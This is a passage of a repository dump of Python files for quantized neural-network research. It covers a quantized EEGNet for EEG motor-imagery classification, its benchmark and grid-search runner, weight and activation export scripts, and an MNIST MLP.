1)/2))/((self.numLevels - 1)/2)\n else:\n y = (y + 1)/2 # map from [-1,1] to [0,1]\n y = STERoundFunctional(y*(self.numLevels - 1))/(self.numLevels - 1)\n y = 2*y - 1\n y = y * self.absMaxValue.item() # map from [-1, 1] to [-max, max]\n# factorLevels = (self.numLevels // 2)\n# y = STERoundFunctional(xclamp*factorLevels)/factorLevels\n else:\n y = x\n return y\n \n def step(self, epoch, clearOptimStateOnStart, optimizer):\n if clearOptimStateOnStart and epoch == self.startEpoch:\n optimizer.state.clear()\n\n if epoch >= self.startEpoch:\n self.started = True\n\n if self.monitorEpoch is not None and epoch == self.monitorEpoch:\n self.monitoring = True\n self.absMaxValue.data[0] = 0.0\n else:\n self.monitoring = False\n \n\n\nif __name__ == \"__main__\":\n #TESTING\n u = torch.randn(10, requires_grad=True)\n x = u*2\n \n y = STEActivation(numLevels=2)(x)\n# y = STERoundFunctional(x)\n# y = clampWithGradInwards(x, -1, 1)\n \n# L = (y-torch.ones_like(y)*10).norm(2) # pull to 10\n L = y.norm(2) # pull to 0\n L.backward()\n \n \n \n \n \n\n\n\n" }, { "alpha_fraction": 0.5587016344070435, "alphanum_fraction": 0.5756215453147888, "avg_line_length": 31.81586456298828, "blob_id": "845d0f5362df4946bb1338691d271c6ce55d0972", "content_id": "a0c3c21873803b06b1f3e455a227d94eec7fee36", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 11584, "license_type": "permissive", "max_line_length": 106, "num_lines": 353, "path": "/eegnet_run.py", "repo_name": "xiaywang/QuantLab", "src_encoding": "UTF-8", "text": "import os\nimport shutil\nimport json\nimport sys\nimport numpy as np\nfrom contextlib import redirect_stdout, redirect_stderr\nimport progress\nfrom tqdm import tqdm\nimport pickle\n\nfrom tensorboard.backend.event_processing.event_accumulator import EventAccumulator\n\nfrom main import main as quantlab_main\n\nPROBLEM = \"BCI-CompIV-2a\"\nTOPOLOGY = \"EEGNet\"\nEXP_FOLDER = \"logs/exp{}\"\nMEAS_ID = 12\nINQ_CONFIG = f\"measurement/M{MEAS_ID:02}.json\"\nBAK_CONFIG = \".config_backup.json\"\nMAIN_CONFIG = 
\"config.json\"\nEXP_BASE = MEAS_ID * 100\nEXPORT_FILE = f\"logs/measurement_{MEAS_ID:02}\" + \"_{}.npz\"\nEXPORT_GRID_FILE = 'logs/grid_{}.npz'\n\nBENCHMARK = True\nGRID_MEASUREMENT = False\nN_ITER = 15\n\n\ndef single_iter(bar=None, silent=False, n_weights=None, n_activ=None):\n iter_stats = np.zeros((9, 4))\n with TestEnvironment():\n for i in range(9):\n subject = i + 1\n stats = _do_subject(subject, bar, silent, n_weights=n_weights, n_activ=n_activ)\n if not silent:\n print(f\"Subject {subject}: quantized accuracy: {stats['valid_acc']:.4f} \")\n iter_stats[i] = np.array([stats['train_loss'],\n stats['train_acc'],\n stats['valid_loss'],\n stats['valid_acc']])\n\n if not silent:\n print(f\"Average quantized accuracy = {iter_stats.mean(axis=0)[3]}\")\n\n return iter_stats\n\n\ndef grid_measurement():\n stats = {}\n cases = [\n (255, 255),\n (255, 127),\n (255, 63),\n (255, 31),\n (255, 15),\n (127, 255),\n (127, 127),\n (127, 63),\n (127, 31),\n (127, 15),\n (63, 255),\n (63, 127),\n (63, 63),\n (63, 31),\n (63, 15),\n (31, 255),\n (31, 127),\n (31, 63),\n (31, 31),\n (31, 15),\n (15, 255),\n (15, 127),\n (15, 63),\n (15, 31),\n (15, 15),\n ]\n with tqdm(desc=f'Grid Searching on measurement {MEAS_ID:02}', total=N_ITER * 9 * len(cases),\n ascii=True) as bar:\n for n_weights, n_activ in cases:\n stats[(n_weights, n_activ)] = np.zeros((N_ITER, 9, 4))\n for i in range(N_ITER):\n iter_stats = single_iter(bar=bar, silent=True, n_weights=n_weights, n_activ=n_activ)\n stats[(n_weights, n_activ)][i, :, :] = iter_stats\n legend = [\"train_loss\", \"train_acc\", \"valid_loss\", \"valid_acc\"]\n\n # store it\n filename = os.path.join(PROBLEM, 'grid_results.pkl')\n with open(filename, 'wb') as _f:\n pickle.dump({\"stats\": stats, \"legend\": legend}, _f)\n\n\ndef benchmark():\n stats = np.zeros((N_ITER, 9, 4))\n\n with tqdm(desc=f'Benchmarking Measurement {MEAS_ID:02}', total=N_ITER * 9, ascii=True) as bar:\n for i in range(N_ITER):\n iter_stats = single_iter(bar=bar, silent=True)\n stats[i, :, :] = iter_stats\n\n # store the data to make sure not to loose it\n np.savez(file=os.path.join(PROBLEM, EXPORT_FILE.format(\"runs\")),\n train_loss=stats[i, :, 0],\n train_acc=stats[i, :, 1],\n valid_loss=stats[i, :, 2],\n valid_acc=stats[i, :, 3])\n\n # compute statistics\n avg_stats = stats.mean(axis=0)\n std_stats = stats.std(axis=0)\n\n # For the overall score, first average along all subjects.\n # For standard deviation, average all standard deviations of all subjects\n mean_avg_stats = avg_stats[:].mean(axis=0) # average over all subjects\n mean_std_stats = std_stats[:].mean(axis=0) # std over all subjects\n\n print(f\"Total Average Accuracy: {mean_avg_stats[3]:.4f} +- {mean_std_stats[3]:.4f}\\n\")\n for i in range(0, 9):\n print(f\"subject {i+1}: quantized model = {avg_stats[i,3]:.4f} +- {std_stats[i,3]:.4f}\")\n\n\ndef _do_subject(subject, bar=None, silent=False, n_weights=None, n_activ=None):\n exp_id = EXP_BASE + subject\n\n if not silent:\n print(f\"Subject {subject}: training quantized model (exp{exp_id})...\\r\", end='',\n flush=True)\n\n modification = {'treat.data.subject': subject}\n if n_weights is not None:\n modification['indiv.net.params.weightInqNumLevels'] = n_weights\n modification[\"indiv.net.params.first_layer_only\"] = True\n if n_activ is not None:\n modification['indiv.net.params.actSTENumLevels'] = n_activ\n valid_stats, train_stats = _execute_quantlab(INQ_CONFIG, exp_id, modification)\n\n if bar is not None:\n bar.update()\n\n # accumulate log files\n if BENCHMARK or 
GRID_MEASUREMENT:\n # _accumulate_logs(subject, exp_id)\n _just_store_anything(subject, exp_id, n_weights=n_weights, n_activ=n_activ)\n\n return _format_all_stats(train_stats, valid_stats)\n\n\ndef _execute_quantlab(config_file, exp_id, modify_keys=None):\n # remove all the logs of the previous quantized training experiment\n log_folder = os.path.join(PROBLEM, EXP_FOLDER.format(exp_id))\n if os.path.exists(log_folder):\n shutil.rmtree(log_folder)\n\n # load configuration\n config = {}\n with open(os.path.join(PROBLEM, config_file)) as _fp:\n config = json.load(_fp)\n\n # modify keys\n for path, value in modify_keys.items():\n _set_dict_value(config, path, value)\n\n # store the configuration back as config.json\n if os.path.exists(os.path.join(PROBLEM, MAIN_CONFIG)):\n os.remove(os.path.join(PROBLEM, MAIN_CONFIG))\n with open(os.path.join(PROBLEM, MAIN_CONFIG), \"w\") as _fp:\n json.dump(config, _fp)\n\n # execute quantlab without output\n with open(os.devnull, 'w') as devnull, redirect_stderr(devnull), redirect_stdout(devnull):\n train_stats, stats = quantlab_main(PROBLEM, TOPOLOGY, exp_id, 'best', 'train', 10, 1, False,\n True)\n\n return stats, train_stats\n\n\ndef _format_all_stats(train_stats, valid_stats):\n stats = {}\n for key, value in train_stats.items():\n if key.endswith(\"loss\"):\n stats['train_loss'] = value\n if key.endswith(\"metric\"):\n stats['train_acc'] = value\n for key, value in valid_stats.items():\n if key.endswith(\"loss\"):\n stats['valid_loss'] = value\n if key.endswith(\"metric\"):\n stats['valid_acc'] = value\n\n return stats\n\n\ndef _format_stats(ref_stats, quant_stats=None):\n stats = {}\n\n if quant_stats is None:\n for key, value in ref_stats.items():\n if key.endswith(\"loss\"):\n stats['loss'] = value\n if key.endswith(\"metric\"):\n stats['acc'] = value\n\n else:\n for key, value in ref_stats.items():\n if key.endswith(\"loss\"):\n stats['float_loss'] = value\n if key.endswith(\"metric\"):\n stats['float_acc'] = value\n for key, value in quant_stats.items():\n if key.endswith(\"loss\"):\n stats['quant_loss'] = value\n if key.endswith(\"metric\"):\n stats['quant_acc'] = value\n\n return stats\n\n\ndef _set_dict_value(d, path, value):\n keys = path.split('.')\n d_working = d\n for key in keys[:-1]:\n d_working = d_working[key]\n d_working[keys[-1]] = value\n\n\ndef _just_store_anything(subject, exp_id, n_weights=None, n_activ=None):\n \"\"\" stores everything \"\"\"\n # extract name of logfile\n stats_folder = os.path.join(PROBLEM, EXP_FOLDER.format(exp_id), \"stats\")\n log_files = os.listdir(stats_folder)\n assert(len(log_files) == 1)\n log_file = os.path.join(stats_folder, log_files[0])\n\n # get eventaccumulator\n ea = EventAccumulator(log_file)\n ea.Reload()\n\n # load data file\n if GRID_MEASUREMENT:\n name_addon = f\"data_W{n_weights}_A{n_activ}_S{subject:02}\"\n else:\n name_addon = f\"data_S{subject:02}\"\n data_file = os.path.join(PROBLEM, EXPORT_FILE.format(name_addon))\n if os.path.exists(data_file):\n with np.load(data_file) as data_loader:\n data = dict(data_loader)\n else:\n data = {'num_trials': 0}\n\n # update the data dictionary to keep the mean value\n num_trials = data['num_trials']\n for key in ea.Tags()['scalars']:\n new_arr = _prepare_scalar_array_from_tensorboard(ea, key)\n new_arr = np.array([new_arr])\n if num_trials == 0:\n # just add the data\n data[key] = new_arr\n else:\n assert(key in data)\n data[key] = np.concatenate((data[key], new_arr), axis=0)\n data['num_trials'] += 1\n\n # store data back into the same file\n 
np.savez(data_file, **data)\n\n\ndef _accumulate_logs(subject, exp_id):\n # extract name of logfile\n stats_folder = os.path.join(PROBLEM, EXP_FOLDER.format(exp_id), \"stats\")\n log_files = os.listdir(stats_folder)\n assert(len(log_files) == 1)\n log_file = os.path.join(stats_folder, log_files[0])\n\n # get eventaccumulator\n ea = EventAccumulator(log_file)\n ea.Reload()\n\n # load data file\n name_addon = f\"data_S{subject:02}\"\n data_file = os.path.join(PROBLEM, EXPORT_FILE.format(name_addon))\n if os.path.exists(data_file):\n with np.load(data_file) as data_loader:\n data = dict(data_loader)\n else:\n data = {'num_trials': 0}\n\n # update the data dictionary to keep the mean value\n num_trials = data['num_trials']\n for key in ea.Tags()['scalars']:\n new_arr = _prepare_scalar_array_from_tensorboard(ea, key)\n if num_trials == 0:\n # just add the data\n data[key] = new_arr\n else:\n assert(key in data)\n data[key] = (data[key] * num_trials + new_arr) / (num_trials + 1)\n data['num_trials'] += 1\n\n # store data back into the same file\n np.savez(data_file, **data)\n\n\ndef _prepare_scalar_array_from_tensorboard(ea, key, start_step=1):\n if ea.Scalars(key)[-1].step == len(ea.Scalars(key)):\n return np.array([x.value for x in ea.Scalars(key)])\n else:\n arr = np.zeros(ea.most_recent_step)\n entries = ea.Scalars(key)\n # we assume the value is zero at the beginning\n for i_entry in range(len(entries)):\n start_idx = entries[i_entry].step - start_step\n end_idx = entries[i_entry + 1].step if i_entry + 1 < len(entries) else \\\n ea.most_recent_step - start_step + 1\n arr[start_idx:end_idx] = entries[i_entry].value\n return arr\n\n\nclass TestEnvironment():\n def __enter__(self):\n # backup config.json if it exists\n if os.path.exists(os.path.join(PROBLEM, MAIN_CONFIG)):\n os.rename(os.path.join(PROBLEM, MAIN_CONFIG),\n os.path.join(PROBLEM, BAK_CONFIG))\n\n # hide progress default output\n self.devnull = open(os.devnull, 'w')\n progress.Infinite.file = self.devnull\n\n return self\n\n def __exit__(self, exc_type, exc_val, exc_tb):\n # remove the created config.json file\n if os.path.exists(os.path.join(PROBLEM, MAIN_CONFIG)):\n os.remove(os.path.join(PROBLEM, MAIN_CONFIG))\n\n # move backup back\n if os.path.exists(os.path.join(PROBLEM, BAK_CONFIG)):\n os.rename(os.path.join(PROBLEM, BAK_CONFIG),\n os.path.join(PROBLEM, MAIN_CONFIG))\n\n # reenable default progress\n progress.Infinite.file = sys.stderr\n\n\nif __name__ == '__main__':\n\n if GRID_MEASUREMENT:\n grid_measurement()\n if BENCHMARK:\n benchmark()\n else:\n single_iter()\n" }, { "alpha_fraction": 0.533423662185669, "alphanum_fraction": 0.5587172508239746, "avg_line_length": 39.0723991394043, "blob_id": "7a8c9ef9b4f8de5350c8823a2d4a9d7faa033901", "content_id": "32b1af545341845a777fd3325602ab54f88e57fb", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 8856, "license_type": "permissive", "max_line_length": 102, "num_lines": 221, "path": "/quantlab/BCI-CompIV-2a/EEGNet/eegnet.py", "repo_name": "xiaywang/QuantLab", "src_encoding": "UTF-8", "text": "# Copyright (c) 2019 Tibor Schneider\n\nimport numpy as np\nimport torch as t\nimport torch.nn.functional as F\n\nfrom quantlab.indiv.inq_ops import INQController, INQLinear, INQConv2d\nfrom quantlab.indiv.ste_ops import STEActivation, STEController\n\n\nclass EEGNet(t.nn.Module):\n \"\"\"\n Quantized EEGNet\n \"\"\"\n\n def __init__(self, F1=8, D=2, F2=None, C=22, T=1125, N=4, p_dropout=0.5,\n 
dropout_type='TimeDropout2d', quantWeight=True, quantAct=True,\n weightInqSchedule=None, weightInqNumLevels=255, weightInqStrategy=\"matnitude\",\n weightInqInitMethod=\"uniform\", actSTENumLevels=255, actSTEStartEpoch=2,\n floorToZero=False, actFirstLayerNumLevels=None, weightFirstLayerNumLevels=None,\n first_layer_only=False):\n \"\"\"\n F1: Number of spectral filters\n D: Number of spacial filters (per spectral filter), F2 = F1 * D\n F2: Number or None. If None, then F2 = F1 * D\n C: Number of EEG channels\n T: Number of time samples\n N: Number of classes\n p_dropout: Dropout Probability\n dropout_type: string, either 'dropout', 'SpatialDropout2d' or 'TimeDropout2D'\n floorToZero: STE rounding is done by floor towards zero\n \"\"\"\n super(EEGNet, self).__init__()\n\n if weightInqSchedule is None:\n raise TypeError(\"Parameter weightInqSchedule is not set\")\n if weightFirstLayerNumLevels is None:\n weightFirstLayerNumLevels = weightInqNumLevels\n if actFirstLayerNumLevels is None:\n actFirstLayerNumLevels = actSTENumLevels\n\n weightInqSchedule = {int(k): v for k, v in weightInqSchedule.items()}\n\n # prepare network constants\n if F2 is None:\n F2 = F1 * D\n\n # Prepare Dropout Type\n if dropout_type.lower() == 'dropout':\n dropout = t.nn.Dropout\n elif dropout_type.lower() == 'spatialdropout2d':\n dropout = t.nn.Dropout2d\n elif dropout_type.lower() == 'timedropout2d':\n dropout = TimeDropout2d\n else:\n raise ValueError(\"dropout_type must be one of SpatialDropout2d, Dropout or \"\n \"WrongDropout2d\")\n\n # store local values\n self.F1, self.D, self.F2, self.C, self.T, self.N = (F1, D, F2, C, T, N)\n self.p_dropout = p_dropout\n\n # Number of input neurons to the final fully connected layer\n n_features = (T // 8) // 8\n\n # prepare helper functions to easily declare activation, convolution and linear unit\n def activ():\n return t.nn.ReLU(inplace=True)\n\n def quantize(numLevels=None, first=False):\n start = actSTEStartEpoch\n monitor = start - 1\n if numLevels is None or (not first and first_layer_only):\n numLevels = actSTENumLevels\n if quantAct:\n return STEActivation(startEpoch=start, monitorEpoch=monitor,\n numLevels=numLevels, floorToZero=floorToZero)\n else:\n return t.nn.Identity()\n\n def linear(name, n_in, n_out, bias=True, first=False):\n if quantWeight and not (not first and first_layer_only):\n return INQLinear(n_in, n_out, bias=bias, numLevels=weightInqNumLevels,\n strategy=weightInqStrategy, quantInitMethod=weightInqInitMethod)\n else:\n return t.nn.Linear(n_in, n_out, bias=bias)\n\n def conv2d(name, in_channels, out_channels, kernel_size, numLevels=None, first=False, **argv):\n if quantWeight and not (not first and first_layer_only):\n if numLevels is None:\n numLevels = weightInqNumLevels\n return INQConv2d(in_channels, out_channels, kernel_size,\n numLevels=numLevels, strategy=weightInqStrategy,\n quantInitMethod=weightInqInitMethod, **argv)\n else:\n return t.nn.Conv2d(in_channels, out_channels, kernel_size, **argv)\n\n # Block 1\n self.quant1 = quantize(actFirstLayerNumLevels, first=True)\n self.conv1_pad = t.nn.ZeroPad2d((31, 32, 0, 0))\n self.conv1 = conv2d(\"conv1\", 1, F1, (1, 64), bias=False,\n numLevels=weightFirstLayerNumLevels, first=True)\n self.batch_norm1 = t.nn.BatchNorm2d(F1, momentum=0.01, eps=0.001)\n self.quant2 = quantize()\n self.conv2 = conv2d(\"conv2\", F1, D * F1, (C, 1), groups=F1, bias=False)\n self.batch_norm2 = t.nn.BatchNorm2d(D * F1, momentum=0.01, eps=0.001)\n self.activation1 = activ()\n self.pool1 = t.nn.AvgPool2d((1, 8))\n 
self.quant3 = quantize()\n # self.dropout1 = dropout(p=p_dropout)\n self.dropout1 = t.nn.Dropout(p=p_dropout)\n\n # Block 2\n self.sep_conv_pad = t.nn.ZeroPad2d((7, 8, 0, 0))\n self.sep_conv1 = conv2d(\"sep_conv1\", D * F1, D * F1, (1, 16), groups=D * F1, bias=False)\n self.quant4 = quantize()\n self.sep_conv2 = conv2d(\"sep_conv2\", D * F1, F2, (1, 1), bias=False)\n self.batch_norm3 = t.nn.BatchNorm2d(F2, momentum=0.01, eps=0.001)\n self.activation2 = activ()\n self.pool2 = t.nn.AvgPool2d((1, 8))\n self.quant5 = quantize()\n self.dropout2 = dropout(p=p_dropout)\n\n # Fully connected layer (classifier)\n self.flatten = Flatten()\n self.fc = linear(\"fc\", F2 * n_features, N, bias=True)\n self.quant6 = quantize(255)\n\n self.inqController = INQController(INQController.getInqModules(self), weightInqSchedule,\n clearOptimStateOnStep=True)\n self.steController = STEController(STEController.getSteModules(self),\n clearOptimStateOnStart=True)\n\n # initialize weights\n # self._initialize_params()\n\n def forward(self, x, with_stats=False):\n\n # input dimensions: (s, 1, C, T)\n x = self.quant1(x)\n\n # Block 1\n x = self.conv1_pad(x)\n x = self.conv1(x) # output dim: (s, F1, C, T-1)\n x = self.batch_norm1(x)\n x = self.quant2(x)\n x = self.conv2(x) # output dim: (s, D * F1, 1, T-1)\n x = self.batch_norm2(x)\n x = self.activation1(x)\n x = self.pool1(x) # output dim: (s, D * F1, 1, T // 8)\n x = self.quant3(x)\n x = self.dropout1(x)\n\n # Block2\n x = self.sep_conv_pad(x)\n x = self.sep_conv1(x) # output dim: (s, D * F1, 1, T // 8 - 1)\n x = self.quant4(x)\n x = self.sep_conv2(x) # output dim: (s, F2, 1, T // 8 - 1)\n x = self.batch_norm3(x)\n x = self.activation2(x)\n x = self.pool2(x) # output dim: (s, F2, 1, T // 64)\n x = self.quant5(x)\n x = self.dropout2(x)\n\n # Classification\n x = self.flatten(x) # output dim: (s, F2 * (T // 64))\n x = self.fc(x) # output dim: (s, N)\n x = self.quant6(x)\n\n if with_stats:\n stats = [('conv1_w', self.conv1.weight.data),\n ('conv2_w', self.conv2.weight.data),\n ('sep_conv1_w', self.sep_conv1.weight.data),\n ('sep_conv2_w', self.sep_conv2.weight.data),\n ('fc_w', self.fc.weight.data),\n ('fc_b', self.fc.bias.data)]\n return stats, x\n return x\n\n def forward_with_tensor_stats(self, x):\n return self.forward(x, with_stats=True)\n\n def _initialize_params(self, weight_init=t.nn.init.xavier_uniform_, bias_init=t.nn.init.zeros_):\n \"\"\"\n Initializes all the parameters of the model\n\n Parameters:\n - weight_init: t.nn.init inplace function\n - bias_init: t.nn.init inplace function\n\n \"\"\"\n def init_weight(m):\n if isinstance(m, t.nn.Conv2d) or isinstance(m, t.nn.Linear):\n weight_init(m.weight)\n if isinstance(m, t.nn.Linear):\n bias_init(m.bias)\n\n self.apply(init_weight)\n\n\nclass Flatten(t.nn.Module):\n def forward(self, input):\n return input.view(input.size(0), -1)\n\n\nclass TimeDropout2d(t.nn.Dropout2d):\n \"\"\"\n Dropout layer, where the last dimension is treated as channels\n \"\"\"\n def __init__(self, p=0.5, inplace=False):\n \"\"\"\n See t.nn.Dropout2d for parameters\n \"\"\"\n super(TimeDropout2d, self).__init__(p=p, inplace=inplace)\n\n def forward(self, input):\n if self.training:\n input = input.permute(0, 3, 1, 2)\n input = F.dropout2d(input, self.p, True, self.inplace)\n input = input.permute(0, 2, 3, 1)\n return input\n" }, { "alpha_fraction": 0.5191181302070618, "alphanum_fraction": 0.5497760772705078, "avg_line_length": 37.7066650390625, "blob_id": "5cbadaa6fe7c452b64f5a67cbb0fcdab8fcb1c0f", "content_id": 
"540eb6edff5e52a3750ffaddcb44db1c6e6e4452", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2903, "license_type": "permissive", "max_line_length": 83, "num_lines": 75, "path": "/quantlab/MNIST/MLP/mlp.py", "repo_name": "xiaywang/QuantLab", "src_encoding": "UTF-8", "text": "# Copyright (c) 2019 ETH Zurich, Lukas Cavigelli\n\nimport math\nimport torch\nimport torch.nn as nn\n\nfrom quantlab.indiv.stochastic_ops import StochasticActivation, StochasticLinear\nfrom quantlab.indiv.inq_ops import INQController, INQLinear\n\nclass MLP(nn.Module):\n \"\"\"Quantized Multi-Layer Perceptron (both weights and activations).\"\"\"\n def __init__(self, capacity, quant_schemes, \n quantAct=True, quantWeights=True, \n weightInqSchedule=None):\n super().__init__()\n nh = int(2048 * capacity)\n if weightInqSchedule != None:\n weightInqSchedule = {int(k): v for k, v in weightInqSchedule}\n def activ(name, nc):\n if quantAct:\n return StochasticActivation(*quant_scheme[name], nc)\n else:\n return nn.ReLU()\n def linear(name, ni, no, bias=False):\n if quantWeights:\n if weightInqSchedule != None:\n return INQLinear(ni, no, bias=bias, numBits=2)\n else: \n return StochasticLinear(*quant_scheme[name], ni, no, bias=bias)\n else:\n return nn.Linear(ni, no, bias=bias)\n \n self.phi1_fc = linear('phi1_fc', 28*28, nh, bias=False)\n self.phi1_bn = nn.BatchNorm1d(nh)\n self.phi1_act = activ('phi1_act', nh)\n self.phi2_fc = linear('phi2_fc', nh, nh, bias=False)\n self.phi2_bn = nn.BatchNorm1d(nh)\n self.phi2_act = activ('phi2_act', nh)\n self.phi3_fc = linear('phi3_fc', nh, nh, bias=False)\n self.phi3_bn = nn.BatchNorm1d(nh)\n self.phi3_act = activ('phi3_act', nh)\n self.phi4_fc = linear('phi4_fc', nh, 10, bias=False)\n self.phi4_bn = nn.BatchNorm1d(10)\n \n #weightInqSchedule={15: 0.5, 22: 0.75, 30: 0.875, 37: 0.9375, 44: 1.0}\n if weightInqSchedule != None: \n self.inqController = INQController(INQController.getInqModules(self), \n weightInqSchedule)\n\n def forward(self, x, withStats=False):\n stats = []\n x = x.view(-1, 28*28)\n x = self.phi1_fc(x)\n x = self.phi1_bn(x)\n x = self.phi1_act(x)\n x = self.phi2_fc(x)\n x = self.phi2_bn(x)\n x = self.phi2_act(x)\n x = self.phi3_fc(x)\n x = self.phi3_bn(x)\n x = self.phi3_act(x)\n x = self.phi4_fc(x)\n x = self.phi4_bn(x)\n if withStats:\n stats.append(('phi1_fc_w', self.phi1_fc.weight.data))\n stats.append(('phi2_fc_w', self.phi2_fc.weight.data))\n stats.append(('phi3_fc_w', self.phi3_fc.weight.data))\n stats.append(('phi4_fc_w', self.phi4_fc.weight.data))\n return stats, x\n else: \n return x\n\n def forward_with_tensor_stats(self, x):\n stats, x = self.forward(x, withStats=True)\n return stats, x\n" }, { "alpha_fraction": 0.7857142686843872, "alphanum_fraction": 0.8214285969734192, "avg_line_length": 28, "blob_id": "e3a293d12d0117c0635115a6850dada631807ac6", "content_id": "7261644584e335de50c05b1be82febc9bd686eb9", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 28, "license_type": "permissive", "max_line_length": 28, "num_lines": 1, "path": "/quantlab/ImageNet/GoogLeNet/preprocess.py", "repo_name": "xiaywang/QuantLab", "src_encoding": "UTF-8", "text": "../MobileNetv2/preprocess.py" }, { "alpha_fraction": 0.8267716765403748, "alphanum_fraction": 0.8267716765403748, "avg_line_length": 30.75, "blob_id": "d077c4b346a1289ac19121452606d419aba34d98", "content_id": "5795b90cbbc08d38ce09d7ca6b5c341aa90c61c9", "detected_licenses": [ 
"Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 127, "license_type": "permissive", "max_line_length": 55, "num_lines": 4, "path": "/quantlab/ETHZ-CVL-AED/MeyerNet/__init__.py", "repo_name": "xiaywang/QuantLab", "src_encoding": "UTF-8", "text": "from .preprocess import load_data_sets\nfrom .postprocess import postprocess_pr, postprocess_gt\n\nfrom .meyernet import MeyerNet\n" }, { "alpha_fraction": 0.6383461952209473, "alphanum_fraction": 0.654475212097168, "avg_line_length": 31.607406616210938, "blob_id": "d1dd36d6ff66ea63e1e3633e8f3e18488d298546", "content_id": "072db0b73716c4c213f8a31e26a03d26e72a4be3", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4402, "license_type": "permissive", "max_line_length": 102, "num_lines": 135, "path": "/export_net_data.py", "repo_name": "xiaywang/QuantLab", "src_encoding": "UTF-8", "text": "import os\nimport numpy as np\nimport argparse\nimport json\nimport torch\nimport shutil\n\nfrom main import main as quantlab_main\n\nparser = argparse.ArgumentParser()\nparser.add_argument('-e', '--exp_id', help='experiment identification', type=int, default=999)\nparser.add_argument('-s', '--sample', help='index of the sample', type=int, default=0)\nparser.add_argument('--train', help='Train network', action='store_true')\nparser.add_argument('-a', '--all', help='Export all samples', action='store_true')\n\nargs = parser.parse_args()\n\nexp_folder = f'BCI-CompIV-2a/logs/exp{args.exp_id:03}'\noutput_file = 'export/{}.npz'\noutput_config_file = \"export/config.json\"\n\n# train the network\nif args.train:\n # delete the exp folder\n try:\n shutil.rmtree(exp_folder)\n print('exp folder was deleted!')\n except:\n print('exp folder does not exist, skipping deletion')\n quantlab_main('BCI-CompIV-2a', 'EEGNet', exp_id=args.exp_id, ckpt_every=1, num_workers=1,\n do_validPreTrain=False, use_single_gpu=True)\n\n# import the EEGnet folder\nexec(open('quantlab/BCI-CompIV-2a/EEGNet/preprocess.py').read())\nexec(open('quantlab/BCI-CompIV-2a/EEGNet/eegnet.py').read())\n\nexp_folder = f'BCI-CompIV-2a/logs/exp{args.exp_id:03}'\n\n# load the configuration file\nwith open(f'{exp_folder}/config.json') as _f:\n config = json.load(_f)\n\n# get data loader\n_, _, dataset = load_data_sets('BCI-CompIV-2a/data', config['treat']['data'])\n\n# load the model\nckpts = os.listdir(f'{exp_folder}/saves')\nckpts = [x for x in ckpts if \"epoch\" in x]\nckpts.sort()\nlast_epoch = int(ckpts[-1].replace('epoch', '').replace('.ckpt', ''))\nckpt = torch.load(f'{exp_folder}/saves/{ckpts[-1]}')\nmodel = EEGNet(**config['indiv']['net']['params'])\nmodel.load_state_dict(ckpt['indiv']['net'])\nfor module in model.steController.modules:\n module.started = True\n\nmodel.train(False)\n\n# export all weights\nweights = {key: value.cpu().detach().numpy() for key, value in ckpt['indiv']['net'].items()}\nnp.savez(output_file.format(\"net\"), **weights)\n\nif args.all:\n samples = []\n labels = []\n predictions = []\n\n n_samples = len(dataset)\n for sample in range(n_samples):\n x = dataset[sample][0]\n x = x.reshape(1, 1, 22, 1125)\n label = dataset[sample][1]\n prediction = model(x)\n\n samples.append(x.numpy())\n labels.append(label.numpy())\n predictions.append(prediction.detach().numpy())\n\n np.savez(output_file.format(\"benchmark\"), samples=samples, labels=labels, predictions=predictions)\n\n\n# save input data\nnp.savez(output_file.format(\"input\"), 
input=dataset[args.sample][0].numpy())\n\n# prepare verification data\nverification = {}\n# do forward pass and compute the result of the network\nwith torch.no_grad():\n x = dataset[args.sample][0]\n verification['input'] = x.numpy()\n x = x.reshape(1, 1, 22, 1125)\n x = model.quant1(x)\n verification['input_quant'] = x.numpy()\n x = model.conv1_pad(x)\n x = model.conv1(x)\n verification['layer1_conv_out'] = x.numpy()\n x = model.batch_norm1(x)\n verification['layer1_bn_out'] = x.numpy()\n x = model.quant2(x)\n verification['layer1_activ'] = x.numpy()\n x = model.conv2(x)\n verification['layer2_conv_out'] = x.numpy()\n x = model.batch_norm2(x)\n verification['layer2_bn_out'] = x.numpy()\n x = model.activation1(x)\n verification['layer2_relu_out'] = x.numpy()\n x = model.pool1(x)\n verification['layer2_pool_out'] = x.numpy()\n x = model.quant3(x)\n verification['layer2_activ'] = x.numpy()\n x = model.sep_conv_pad(x)\n x = model.sep_conv1(x)\n verification['layer3_conv_out'] = x.numpy()\n x = model.quant4(x)\n verification['layer3_activ'] = x.numpy()\n x = model.sep_conv2(x)\n verification['layer4_conv_out'] = x.numpy()\n x = model.batch_norm3(x)\n verification['layer4_bn_out'] = x.numpy()\n x = model.activation2(x)\n verification['layer4_relu_out'] = x.numpy()\n x = model.pool2(x)\n verification['layer4_pool_out'] = x.numpy()\n x = model.quant5(x)\n verification['layer4_activ'] = x.numpy()\n x = model.flatten(x)\n x = model.fc(x)\n verification['output'] = x.numpy()\n x = model.quant6(x)\n verification['output_quant'] = x.numpy()\n\nnp.savez(output_file.format(\"verification\"), **verification)\n\n# copy the configuration file to the export folder\nshutil.copyfile(f'{exp_folder}/config.json', output_config_file)\n" }, { "alpha_fraction": 0.558834969997406, "alphanum_fraction": 0.56291264295578, "avg_line_length": 44.57522201538086, "blob_id": "b015e9899a85e4e0aea8ff59eefbc0ec4e57eae3", "content_id": "ba69487b5459c0cfd36b23f6d2c6e88ee95b49f6", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5150, "license_type": "permissive", "max_line_length": 118, "num_lines": 113, "path": "/main.py", "repo_name": "xiaywang/QuantLab", "src_encoding": "UTF-8", "text": "# Copyright (c) 2019 UniMoRe, Matteo Spallanzani\n# Copyright (c) 2019 ETH Zurich, Lukas Cavigelli\n\nimport argparse\n\nfrom quantlab.protocol.logbook import Logbook\nfrom quantlab.indiv.daemon import get_topo\nfrom quantlab.treat.daemon import get_algo, get_data\nfrom quantlab.protocol.rooms import train, test\nimport quantlab.indiv as indiv\n\n\ndef main(problem, topology, exp_id=None, load='best', mode='train', ckpt_every=10, num_workers=10,\n do_validPreTrain=True, use_single_gpu=False):\n # 